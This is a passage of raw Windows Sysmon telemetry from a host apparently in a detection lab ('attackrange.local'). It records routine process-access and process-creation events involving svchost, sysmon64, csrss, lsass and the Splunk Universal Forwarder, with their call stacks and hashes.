RNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.067{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.533{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.520{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.304{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.410{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
